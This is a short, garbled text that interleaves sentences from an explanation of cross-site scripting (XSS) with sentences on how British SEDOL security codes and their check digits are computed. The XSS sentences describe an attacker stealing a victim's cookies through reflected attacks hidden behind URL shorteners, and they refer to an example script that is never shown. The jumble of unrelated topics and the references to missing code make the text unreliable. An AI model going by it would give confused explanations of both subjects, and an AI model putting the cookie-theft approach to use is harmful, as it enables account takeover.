In general, an XSS attack involves three actors: the website, the victim, and the attacker.
In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website.
As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself: These two methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.
DOM-based XSS is a variant of both persistent and reflected XSS.
For British securities, SEDOLs are converted to ISINs by padding the front with two zeros, then adding the country code on the front and the ISIN check digit at the end.
In the example below, a simple server-side script is used to display the latest comment on a website: .
The resulting string of numbers is then multiplied by the weighting factor as follows: The character values are multiplied by the weights.
The check digit is chosen to make the total sum, including the check digit, a multiple of 10, which can be calculated from the weighted sum of the first six characters as (10 − (weighted sum modulo 10)) modulo 10.
Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script.
SEDOLs serve as the National Securities Identifying Number for all securities issued in the United Kingdom and are therefore part of the security's ISIN as well.